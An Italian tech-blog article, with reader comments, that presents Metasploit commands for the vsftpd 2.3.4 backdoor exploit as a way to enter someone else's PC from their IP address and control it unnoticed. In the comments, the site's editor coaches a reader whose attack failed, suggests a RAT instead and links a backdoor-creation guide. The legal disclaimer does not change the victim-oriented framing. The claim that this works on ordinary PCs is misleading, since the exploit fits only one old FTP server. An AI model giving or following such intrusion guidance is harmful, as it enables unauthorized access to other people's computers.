
Entrare in un altro PC conoscendo l’indirizzo IP
Abbiamo analizzato vari metodi per sviluppare o creare backdoor e oggi andremo ad approfondire su come entrare in un altro PC conoscendo l’indirizzo IP. Infatti, come abbiamo avuto modo di vedere già altre volte, l’attaccante per portare a termine l’apertura di una backdoor o il compimento di qualsiasi altro tipo di attacco, quasi sempre si avvale dell’IP del target; infatti l’indirizzo IP (oppure chiamato ipv4) serve a identificarci all’interno di una rete e per questo racchiude in se una serie di importantissime informazioni sul nostro dispositivo e sulla nostra connessione. Può essere utile a rintracciarci e a volte entrare nei nostri PC e telefoni per capire chi siamo, cosa facciamo e ottenere altri svariati dati e informazioni. Mediante una serie di passaggi, vi illustrerò uno dei tantissimi modi per riuscire a trovare una falla di sicurezza all’interno di un PC e riuscire a evadere i sistemi di protezione per controllarlo da remoto, senza che la vittima se ne accorga; ovviamente ricordo sempre che se volete testare ciò, dovete farlo esclusivamente sui vostri dispositivi e non danneggiare quelli altrui. Partiamo! Come primo passaggio apriamo un terminale e digitiamo il comando “service postgresql start”
Dopo aver digitato questo comando potremo procedere con gli altri procedimenti; innanzitutto avviamo la console Metasploit Framework:
-msfconsole
-use exploit/unix/ftp/vsftpd_234_backdoor
-set RHOST “IP vittima”
-set PAYLOAD cmd/unix/interact
-exploit
-A questo punto metasploit dovrebbe riuscire ad aprire una sessione con il computer di cui avete inserito l’indirizzo IP; potete come sempre venire a conoscenza dei comandi mediante il comando help, che elencherà tutte le azioni che potete eseguire da remoto sul PC target.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
7 Commenti
Lascia un commento Annulla risposta
I PIÙ LETTI
ARTICOLI RECENTI
ottimo
dopo che ho fatto EXPLOIT mi vieni questo : “ip” -Exploit failed [unreachable] : Rex:: ConnectionRefused The connection was refused by the remote host (ip).
Exploit completed, but no session was created. Mi puoi aiutare
Ciao! La situazione da te descritta si verifica quando l’exploit, seppur eseguito correttamente, non è riuscito a varcare i sistemi di sicurezza installati sul dispositivo che stai attaccando. Succede anche a me, questa disciplina richiede pazienza e tanti tentativi, vedrai che se sarai fortunato riuscirai a trovare un altro metodo adatto al tuo hacking. Ti saluto e spero di esserti stato d’aiuto!
Alessandro, redazione Tecnogalaxy.
Grazie per la tua risposta, per “vedrai che se sarai fortunato riuscirai a trovare un altro metodo adatto al tuo hacking.” Intendi un altro metodo per entrare in un pc tramite ip o un’altro metodo per entrare in un pc.(per esempio tramite un rat)
Dipende da te, puoi usare entrambi i metodi; poi vedrai quale dei due sarà più efficiente. Di solito il più utilizzato è quello tramite IP, ma non sempre riesce ad entrare nel sistema; in questo caso potrai valutare se utilizzare un rat.
Alessandro, redazione Tecnogalaxy
E se volessi creare backdoor nuove cosa cobsiglieresti?
Per creare backdoor nuove puoi utilizzare questa procedura https://www.tecnogalaxy.it/creare-una-backdoor-manualmente-con-kali-linux/
Ti permetterà di sviluppare nuovi file maligni adattandoli al determinato lavoro che vuoi svolgere; per esempio puoi scegliere a tuo piacimento il formato.